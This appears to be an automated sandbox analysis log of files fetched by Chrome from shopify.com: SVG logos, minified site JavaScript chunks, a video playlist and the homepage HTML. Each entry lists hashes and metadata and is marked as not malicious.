                                                                    Preview:<svg width="212" height="63" viewBox="0 0 212 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="211" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6144)"/>.<g clip-path="url(#clip0_1296_6144)">.<path d="M33.6372 37.7591V29.6866L30.3249 37.7591H28.4582L25.1459 29.7528V37.7591H23V26.2441H25.955L29.414 34.558L32.7926 26.2441H35.847V37.7591H33.6372Z" fill="black"/>.<path d="M44.4119 31.9123C44.1682 31.8627 43.9576 31.8461 43.7612 31.8461C42.6564 31.8461 41.6982 32.3832 41.6982 34.1032V37.7586H39.5381V29.7664H41.6343V30.9518C42.1217 29.8966 43.2265 29.7002 43.9079 29.7002C44.0877 29.7002 44.2486 29.7168 44.4119 29.7333V31.9123Z" fill="black"/>.<path d="M47.9084 34.915C48.7365 34.915 49.4013 35.5799 49.4013 36.3938C49.4013 37.2053 48.7365 37.8725 47.9084 37.8725C47.0969 37.8725 46.4297 37.2053 46.4297 36.3938C46.4297 35.5822 47.0969 34.915 47.9084 34.915Z" fill="black"/>.<path d="M78.7127 37.7591V32.9823H73.6946V37.7591H71.4541V26.2441H7
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):8604
                                                                    Entropy (8bit):4.231148346557265
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:88903DCC49157F65E0C11DD1BBAB1042
                                                                    SHA1:730AD708A124DE325A6178227FFC1EA82B579122
                                                                    SHA-256:A87526353F498F8819230BC64831259A51B09AB89421C4E7A6A62CD7C4AE72AE
                                                                    SHA-512:3EE5814C9C77655FDEC3C32604A12E4816FD7024D8F046FA3BB205380AAC29991DBA3BD0FBC1AB3395AF0357FF9078499D4280E61F3548D1EC03EEBF24E69845
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="143" height="65" viewBox="0 0 143 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1549_7345)">.<rect x="1" y="1" width="141" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip1_1549_7345)">.<path fill-rule="evenodd" clip-rule="evenodd" d="M27.363 35.6195L23.4377 24.7506L23.4139 24.6853L17 24.6857V25.1017H17.0992C18.2431 25.1017 19.0299 25.367 19.4382 25.89C19.8515 26.4192 20.0607 27.3864 20.0607 28.7648V36.185C20.0607 37.5302 19.8365 38.4948 19.3944 39.051C18.9524 39.599 18.1801 39.8766 17.0992 39.8766H17V40.3135H23.9678V39.8766H23.8687C22.6021 39.8766 21.7306 39.6037 21.279 39.0653C20.8264 38.5225 20.5969 37.3646 20.5969 35.624V25.5992C20.5969 25.5446 20.598 25.4987 20.5996 25.4602L20.6655 25.5852L25.8229 40.247L25.8461 40.3135H26.5145L30.9035 25.5831C30.947 25.4486 30.9823 25.3745 31.0043 25.3346C31.0127 25.3808 31.0212 25.4612 31.0212 25.5992L31.0456 38.6361C31.0456 39.2112 30.9911 39.4114 30.9594 39.4775C30.9559 39.4842 30.9203 39.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (2565)
                                                                    Category:downloaded
                                                                    Size (bytes):2566
                                                                    Entropy (8bit):5.403943695953836
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DB75B3E2FF6B23A9FEEC02E08ABD4922
                                                                    SHA1:3D956D6E3227C7626FC63102864EED77137332AB
                                                                    SHA-256:10C87E423BAB667329077527BB8FC684544DFE6117EB5F37E289012C697A43CD
                                                                    SHA-512:BBC62A65FF8A74ADBB6328ABCA1C07E34DC124CD61448377D12B7B67DEE9A19C12376E508B4BA800BA0B1FCAD0F6C14E0ABEF30FDC879AC4921E861C30F53779
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-CAV6JYD5.js
                                                                    Preview:import{a as h}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-UGLZPHL3.js";import{b as g}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EM5M5Y6T.js";import{a as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-VSRONMTM.js";import{a as c}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-MOSJSY7P.js";import{b as f}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HLTKSJPY.js";import{a as k}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js";import{a as P}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-52DI3OUV.js";import{a as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{a as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as r}from"https://cdn.shopif
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (4389)
                                                                    Category:downloaded
                                                                    Size (bytes):4390
                                                                    Entropy (8bit):4.573010354401591
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:6F5382F5C77B19D1DB8C88B09E127F47
                                                                    SHA1:CC022BCB9EB81C9BE4E96120142454D4B72AAF13
                                                                    SHA-256:E5EB5FC06838BB295358E30F119F397868F240E3B7BC93044467F68376C5D278
                                                                    SHA-512:099517F0199AA8CE56E5E91FFFA70184D338487D836B29A380D613ADFEA356FA9674A27FF977A99356DBEDA0FD5DFA69CF404403D91655A60FF25680F0AEA363
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-N56232H5.js
                                                                    Preview:import{b as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-O6AAYXW4.js";var e=t(["inline-block self-center overflow-hidden max-w-full px-button-px py-button-py ring-inset","rounded-button text-button-size font-button-font font-button-weight tracking-button-tracking transition-all duration-150","focus-visible:outline-2 focus-visible:outline-offset-2 focus-visible:outline-state-focus focus-visible:outline"],{variants:{intent:{primary:"",secondary:"hover:ring-1 disabled:hover-ring-0"},mode:{light:"",dark:""},size:{small:"",large:"md:px-button-lg-px md:py-button-lg-py md:text-button-lg-size"},border:{true:"border-2",false:"border-0"}},compoundVariants:[{intent:"primary",mode:"light",className:["text-button-light-primary-text bg-button-light-primary-bg border-button-light-primary-border ring-button-light-primary-border","hover:text-button-light-primary-text-hover hover:bg-button-light-primary-bg-hover hover:border-button-light-primary-border-hover hover:ri
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:downloaded
                                                                    Size (bytes):14913
                                                                    Entropy (8bit):3.853572586653865
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C99F9BB49EC7DEC96678765339586EDC
                                                                    SHA1:EB4ACE730861489FCD74FD6AF390425C99F69AF3
                                                                    SHA-256:66B6B4EEC53662AB4C26082B7791D349323B165101D9349937FA5DD1751C0329
                                                                    SHA-512:5CC0EEF7749B38DF6B5C37C4C36452FA8C105FE2555C99AFC5BCF390B81B31A8462B8DE510B80C6CC31B5CD8ED2AD2A6BB0329CCA0E0E3FBE3C28138996601E6
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/b/shopify-brochure2-assets/c99f9bb49ec7dec96678765339586edc.svgz
                                                                    Preview:<svg width="119" height="63" viewBox="0 0 119 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="118" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1296_6112)"/>.<path d="M63.7267 26.1123C63.7678 26.1123 63.8191 26.1123 63.8601 26.1021C64.537 26.0312 65.1422 25.4838 65.2448 24.8047C65.3473 24.1357 64.9165 23.5782 64.2601 23.5072C64.2191 23.5072 64.1678 23.4971 64.1267 23.4971C64.0857 23.4971 64.0344 23.4971 63.9934 23.5072C63.3165 23.5782 62.7113 24.1255 62.6087 24.8047C62.5574 25.1595 62.6497 25.4737 62.8446 25.717C63.0498 25.9602 63.3575 26.1123 63.7267 26.1123V26.1123Z" fill="black"/>.<path d="M94.6007 36.9988C94.6007 35.2148 93.7186 33.5828 92.9391 32.1434C92.2724 30.9169 91.6775 29.8019 91.8314 28.9707C91.9442 28.3727 92.375 28.028 93.0417 27.9875C93.0622 27.9875 93.0827 27.9774 93.1032 27.9774C93.134 27.9672 93.1648 27.947 93.1955 27.9267C93.2263 27.9064 93.2468 27.876 93.2571 27.8456C93.2571 27.8355 93.2674 27.8354 93.2674 27.8253
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):1756
                                                                    Entropy (8bit):5.089916936895969
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:68A396597AFF07C2AA75E1C96A7B99C1
                                                                    SHA1:A2CBC3D80D62EBB3A02951B9FD7B4AC36E728187
                                                                    SHA-256:58E0F98EEAB2C59A0B47A0804813EA12900A1D5353D4E9AD30B36075AD8C40B8
                                                                    SHA-512:E52336C1089AF2CAC68E68FA5A3B85435B3AC5B62270995BD04A02B7510EF6835A3D71FB99473988F463DB289CD67A483679E5318D35EF539CDB73DE5AB4F86D
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="117" height="65" viewBox="0 0 117 65" fill="none">.<rect x="1" y="1" width="115" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_2404_29466)">.<path d="M81.079 21C84.3627 28.6183 87.6541 36.2285 91 43.9758C89.9184 43.9758 88.9613 44.0161 88.0198 43.9436C87.7786 43.9274 87.4673 43.5889 87.3506 43.3228C86.8215 42.17 86.3313 41.0011 85.88 39.816C85.6621 39.2517 85.3975 38.9937 84.7673 39.0018C81.4992 39.034 78.2233 39.034 74.9553 39.0018C74.3328 39.0018 74.0449 39.2275 73.827 39.7999C73.3757 40.9849 72.8388 42.1297 72.3797 43.3148C72.1852 43.8146 71.9206 44.0081 71.3915 43.9839C70.5434 43.9355 69.6952 43.9678 68.707 43.9678C72.0374 36.2366 75.321 28.6183 78.5968 21C79.4216 21 80.2464 21 81.079 21ZM79.8652 25.5226C78.3401 29.1181 76.9239 32.4637 75.4688 35.9061H84.2304C82.7831 32.4718 81.3747 29.1262 79.8652 25.5226V25.5226Z" fill="black"/>.<path d="M40.9836 21V40.993H53.8769V43.9113H37.8867V21H40.9836Z" fill="black"/>.<path d="M
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (48791)
                                                                    Category:downloaded
                                                                    Size (bytes):48792
                                                                    Entropy (8bit):5.284322554634187
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8C85400C47196BDBED84430B3E92BA6D
                                                                    SHA1:4D58A407519C7CDCB39EA867ED2AB306982ECEC7
                                                                    SHA-256:615430DFE7671039E26D4DF10BD4CF746FEBB8180B8BBF67E09F0A940DDDC7C4
                                                                    SHA-512:08AB006E83DED8D2DC16CB598CAE875FA35E5CA6D89F68F98F33C630C2F1C11B85C1E4FDB1C74F1EA423A88D1ADA9510A127EC10BA87ACA8178FF3703613B3AD
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3ENXFNAO.js
                                                                    Preview:var de={type:"logger",log(i){this.output("log",i)},warn(i){this.output("warn",i)},error(i){this.output("error",i)},output(i,e){console&&console[i]&&console[i].apply(console,e)}},k=class{constructor(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.init(e,t)}init(e){let t=arguments.length>1&&arguments[1]!==void 0?arguments[1]:{};this.prefix=t.prefix||"i18next:",this.logger=e||de,this.options=t,this.debug=t.debug}log(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"log","",!0)}warn(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"warn","",!0)}error(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"error","")}deprecate(){for(var e=arguments.length,t=new Array(e),s=0;s<e;s++)t[s]=arguments[s];return this.forward(t,"warn","WARNING DEPRECATED: ",!0)}forward(e,t,s,n){return n&&!this.debug?null:(typeof e[0]=="string"&&(e[0]=`${s}${
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):131
                                                                    Entropy (8bit):4.937114128840511
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:51E052C66D61AF61D91D8487C05982E6
                                                                    SHA1:70E4FCE750E2B80D7F7ED2B523483DBFA8EB7E4B
                                                                    SHA-256:684AEA5D3535EC216C2690E64AC56403989FC997639FF8ABC1FBCD3EC82797B8
                                                                    SHA-512:62D70A10F1F9E57DC35A977EA9735C84EBF5B16E32A7980A4206187BEC4653B6E554CFD315DAEA4CF8A77AE92CA39E1402C736ABD899D3E0EA821997224AB438
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HDOSTYFD.js
                                                                    Preview:import{a as e}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-X2RZ36X5.js";var o=e;export{o as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:M3U playlist, ASCII text
                                                                    Category:downloaded
                                                                    Size (bytes):933
                                                                    Entropy (8bit):5.327901716122982
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DECC93C8BE84CAA0064381D4F01595E6
                                                                    SHA1:749274CB89327C317C3E77A10D2F7FF6874425C2
                                                                    SHA-256:C48CD08C36BD8D7F06A0D9D43777E964E385422F7008B3FABA1182BE11092141
                                                                    SHA-512:E0B9B82C67D008700197FC2E8247D0725698BFC3B34F9D70236D7EE5BD2391251EDF114A850A8A740986C7EABEAF9A35E097CC4CA5FAB23A34D9239FB39B5C07
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:"https://cdn.vidyard.com/media/hls/KCQ8JhPOn27wSTLOQ5BJnw/,2160p,1440p,full_hd,hd,480p,sd,.mp4.urlset/master.m3u8?NZ4faat8g9ClbxoYc-380bU-9CBPl6OXJUtSDR8cad0l7ou7NPDX1wMJ78UccT9hnYu4pCosuW2MIo4zuo2nhKQm6BP_mLtPt7wJaih2jlvds08XP904Q6FwzggVbwoBsEB4LYNGntXfcYALcjAHBTPQLZbnT0rIWShAJkP3iAMsHReBg9B6nZrwhYNUxU6YrKxoqhPjaZRq8VTPfGettg"
                                                                    Preview:#EXTM3U.#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=7833974,RESOLUTION=3840x2160,FRAME-RATE=23.974,CODECS="avc1.640033,mp4a.40.2",VIDEO-RANGE=SDR.index-f1-v1-a1.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=3865713,RESOLUTION=2560x1440,FRAME-RATE=23.974,CODECS="avc1.640033,mp4a.40.2",VIDEO-RANGE=SDR.index-f2-v1-a1.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=2572258,RESOLUTION=1920x1080,FRAME-RATE=23.974,CODECS="avc1.640029,mp4a.40.2",VIDEO-RANGE=SDR.index-f3-v1-a1.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1657655,RESOLUTION=1280x720,FRAME-RATE=23.974,CODECS="avc1.64001f,mp4a.40.2",VIDEO-RANGE=SDR.index-f4-v1-a1.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1134298,RESOLUTION=854x480,FRAME-RATE=23.974,CODECS="avc1.4d401f,mp4a.40.2",VIDEO-RANGE=SDR.index-f5-v1-a1.m3u8.#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=842664,RESOLUTION=640x360,FRAME-RATE=23.974,CODECS="avc1.4d401f,mp4a.40.2",VIDEO-RANGE=SDR.index-f6-v1-a1.m3u8..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):3879
                                                                    Entropy (8bit):4.669471443190836
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DE19891EE27475AE8F8880223EF1AC4A
                                                                    SHA1:0AF00C00E7001B4EA32B412EE79928F308FB0064
                                                                    SHA-256:C97000CCC50A90AF3888BA7CDE9C71E2CAC40961E4D9F6C08FE0959894CBBBC8
                                                                    SHA-512:C74B06E1D0B3FA242ED5635D7104088F812ABF87D6C9D7AA3252A780663AC5A41CBB539B868F47118EEF1701EAE411BD8289657898B83910A0A2F83146B035AC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="130" height="65" viewBox="0 0 130 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="128" height="63" rx="7.79" fill="white"/>.<g clip-path="url(#clip0_1549_7268)">.<path d="M33.001 30.2015L31.1938 30.0703C29.8338 29.9535 29.4466 29.6431 29.4466 28.7983C29.4466 28.2023 29.7842 27.4551 31.9266 27.4975C34.0005 27.5715 36.0609 27.8635 38.0738 28.3687L38.3938 24.4551C36.2763 23.9398 34.1034 23.6875 31.9242 23.7039C27.657 23.7039 25.0442 25.1087 25.0226 28.6911C25.001 32.3599 26.957 33.3103 31.4018 33.6335C33.1378 33.7599 34.6722 33.9303 34.6722 35.2335C34.6722 36.1823 33.9698 36.4335 31.9242 36.3767C29.6885 36.2609 27.4713 35.9088 25.3098 35.3263L25.001 39.3263C27.2456 40.0004 29.5808 40.3242 31.9242 40.2863C38.2274 40.2863 38.8722 37.4063 38.8722 35.2039C38.8714 32.1231 37.7946 30.6895 33.001 30.2015Z" fill="black"/>.<path d="M105.395 27.4935V23.8359H92.5496V27.6247H99.756V27.7559L92.0488 36.4855V40.1655H105.395V36.3767H97.5792V36.2455L105.395 27.4935
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):12283
                                                                    Entropy (8bit):3.896902347663198
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:B450E474F3BFD464CFE5B6FCD8898C0B
                                                                    SHA1:8ED39B9853AF4797A90FEA56ECDA33B5F202489F
                                                                    SHA-256:AB527048BDD79B3CBFF90BD7B6B86E40DFEB711CA4BC8D8F2848B29345C3D343
                                                                    SHA-512:1C0498426289D8F74A7B1BEB6E4CEEA9FE56AF2EBEDFFC1876A780311BD4BE29BE9F5803AEB123F422E00E7BF01461EAD62564FA13DAD30F1909A581597FAC45
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="139" height="63" viewBox="0 0 139 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="138" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1303_6161)"/>.<path d="M120 35C120 35.0718 120 35.1333 120 35.2051C119.843 35.359 119.676 35.5128 119.52 35.6667C118.841 36.3026 118.038 36.4359 117.203 36.1077C116.409 35.8 116.253 35.1026 116.253 34.3333C116.263 32.7949 116.253 31.2667 116.253 29.6462C115.814 29.6462 115.397 29.6462 114.979 29.6462C114.979 29.5949 114.979 29.5538 114.979 29.5026C115.376 29.5026 115.772 29.5026 116.232 29.5026C116.232 28.8872 116.232 28.3333 116.232 27.7385C116.639 27.6769 116.994 27.6256 117.411 27.5641C117.411 28.2 117.411 28.7949 117.411 29.441C118.152 29.441 118.841 29.441 119.52 29.441C119.52 29.4923 119.53 29.5436 119.53 29.5949C118.852 29.5949 118.173 29.5949 117.432 29.5949C117.432 30.0359 117.432 30.3949 117.432 30.7436C117.432 31.9026 117.432 33.0615 117.432 34.2308C117.432 34.4667 117.443 34.7128
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1264)
                                                                    Category:downloaded
                                                                    Size (bytes):1265
                                                                    Entropy (8bit):5.268417815863785
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1E2F6D06E5B22E98B2AFBD5FA573ADF2
                                                                    SHA1:661F3A0D4605D4FD5C10F95EF36AACA5243C38A7
                                                                    SHA-256:5073B6BCB1D9C66074BD9654DC38F4BAC4706F7E64CFF7ED24990D928D1AB07C
                                                                    SHA-512:8E43555FC9620915666F6D33EAC230AD0C982802622BEE2FEEC673AFE736E8F110A59BE6E7ED4BB42A90F4E3645C17677E5AE84D3F9E0F68A55802D30C3B7FC7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3IZVO27T.js
                                                                    Preview:import{l as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as d}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var t=m(d());var f=o?(e,r)=>{console.groupCollapsed(`%c[useIntersectionObserver] \u{1F440} DO NOT IGNORE \u{1F440} (Render #${r}) If you see this log spam the console, expand to investigate why...`,"font-weight: bold;"),console.log("useIntersectionObserver params should be memoized to avoid unnecessary observer re-creation."),console.log("Check the following stack trace to see where you may need to add some memoization (eg. useCallback, useMemo):"),console.log(e),console.groupEnd()}:null,b=(e,r,n)=>{let u=o?new Error().stack:"",s=(0,t.useRef)(0);(0,t.useEffect)(()=>{if(o){let c=setInterval(()=>{s.current=0},2e3);return()=>clearInterval(c)}},[]),(0,t.useEffect)(()=>{s.cur
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):5954
                                                                    Entropy (8bit):4.234574782209848
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CF32724C718F09D23EEF5489F79BF6B9
                                                                    SHA1:CD8315E5D657060984C4CF22D8882F817771B5C2
                                                                    SHA-256:01F41CAB78303ED297A968F7A69C782DFB065CD73B911DC68DE6FA62A58D86D5
                                                                    SHA-512:F55E196498AC7102C70752F7D676FC2248E044E93A572619FE280160D16819B3C507AB9636A0C25EA156808261C72AB60B4A28A878777C87E89817763E5F4EB9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="176" height="65" viewBox="0 0 176 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="1" y="1" width="174" height="63" rx="7.79" fill="white"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M90.8857 42.6785L89.5658 41.0286C88.4859 42.1085 86.1161 43.1585 84.3762 43.1585C81.4064 43.1585 78.8566 41.0286 78.8566 38.2088C78.8566 34.759 82.1563 32.8691 83.1463 32.5392C82.4863 31.7292 81.3464 30.3193 81.3464 28.5794C81.4364 26.2696 82.8163 24.4697 85.8761 24.4697C88.5159 24.4697 90.4958 26.2096 90.4958 28.7594C90.4958 31.6392 88.2759 32.6292 87.616 33.1991L89.7458 36.2589C90.3158 35.509 90.8858 33.7091 90.8258 33.3791H93.7056C93.7056 33.3791 93.2856 37.0089 91.6357 38.7188L94.6955 42.6785H90.8857ZM85.9661 27.1995C85.0661 27.1995 84.3162 27.9495 84.4062 28.6694C84.4962 29.6594 85.3061 30.3193 85.8161 30.9793C86.476 30.4993 87.616 29.8394 87.616 28.7594C87.616 27.9495 86.956 27.1995 85.9661 27.1995ZM84.8862 34.879C82.0963 36.7689 82.2463 38.0888 82.2463 38.0888C82.2463
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (716)
                                                                    Category:downloaded
                                                                    Size (bytes):717
                                                                    Entropy (8bit):5.350549121446476
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:49F37EED4BC9A18CF67A5CC1C157422C
                                                                    SHA1:C0A551AB27A088AE76E23208B509A6D94A8C8678
                                                                    SHA-256:2EDC020EA8899F8E48C678D3DF37011FCB353755097169B7A9697E3E56E6840F
                                                                    SHA-512:E86B0DB9D38108916D6F7E6539659DDB89C1C92EFC4AB9B775986976CCF5AC674EF25B78F67CE0856D7573F7592129DB6F62DA1EBC1E76323392EC01A55D1FE8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/Next-V4DB32HT.js
                                                                    Preview:import{a as t}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var o=r(t()),n=e=>(0,o.jsxs)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 16 16",fill:"none",...e,children:[(0,o.jsx)("path",{d:"M2.40002 8L13.6 8",stroke:"currentColor",strokeWidth:"2",strokeLinecap:"round",strokeLinejoin:"round"}),(0,o.jsx)("path",{d:"M9.59998 4L13.6 8L9.59998 12",stroke:"currentColor",strokeWidth:"2",strokeLinecap:"round",strokeLinejoin:"round"})]}),s=n;export{s as default};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (339)
                                                                    Category:downloaded
                                                                    Size (bytes):340
                                                                    Entropy (8bit):5.113794552717199
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C5DEBD60D3FB02EF26CB1F0DE7A42900
                                                                    SHA1:499267BC0AEBEB4999916F449B9884FA86CC4EAA
                                                                    SHA-256:A529D12C618531DF4746447B8131187400FCB1014F094424E6031E892ACC0ECB
                                                                    SHA-512:5EA60CDFF527CF176EEC1913E28587CDF403D3DC2AF61EB45253092CB2886CFF2FE50E779392173EC344BB7476BCEE73E9F42FEC46884BFDE3E30D6DFBEDF310
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-SDWEBNFN.js
                                                                    Preview:import{a as o}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as r}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var n=r(o());function c({componentName:t,...e}){return(0,n.jsx)("a",{...e,...t?{"data-component-name":t}:{}})}export{c as a};.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):419379
                                                                    Entropy (8bit):5.402884382432746
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8EC2067794009FFB1E605AED2A480FA6
                                                                    SHA1:8B180A1D81EDAC5428A2CAA3C7D852F5532C1569
                                                                    SHA-256:360DDB9D7EA637F60ED19DDBBC580B6D6BBEFA5BBB09CF9DC3BDF53BC178E0D2
                                                                    SHA-512:3C405B76C10CA1128C96F398929E1A12DF6913142D970B1C3B9D6869FFF307ACFA09C462EA3EFCE183D9C96A05A726D7F8290B4534B4A936839CB1D3A7342136
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://www.shopify.com/
                                                                    Preview:<!DOCTYPE html><html lang="en"><head><title>Start and grow your e-commerce business - 3-Day Free Trial - Shopify USA</title><meta charSet="utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><meta name="description" content="Try Shopify free and start a business or grow an existing one. Get more than ecommerce software with tools to manage every part of your business."/><meta property="fb:pages" content="20409006880"/><meta property="fb:app_id" content="847460188612391"/><meta property="og:type" content="website"/><meta property="og:site_name" content="Shopify"/><meta property="og:title" content="Start and grow your e-commerce business - 3-Day Free Trial"/><meta property="og:description" content="Try Shopify free and start a business or grow an existing one. Get more than ecommerce software with tools to manage every part of your business."/><meta property="og:image" content="https://cdn.shopify.com/shopifycloud/brochure/assets/home/redesign2022/social-share-lar
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (1338)
                                                                    Category:downloaded
                                                                    Size (bytes):1339
                                                                    Entropy (8bit):5.451218771478626
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CFA520E34C276A99F2D0A50DE13E6985
                                                                    SHA1:6BC39012695DAA44964792F8A0A53C8840D97D39
                                                                    SHA-256:1A3A7D563109D834FC52965BAD8CA2614027973B7AE37B5CC9398D58E968D287
                                                                    SHA-512:25E85D8F54681EFC4014A5F157ACF7CB960E26729813C0BAF1508FFF43691248A93EBEF5C866D2B8E479AC3312D29EF39F73848B3BC60ABDE53A69ADF571AEE7
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-UJH7MDZK.js
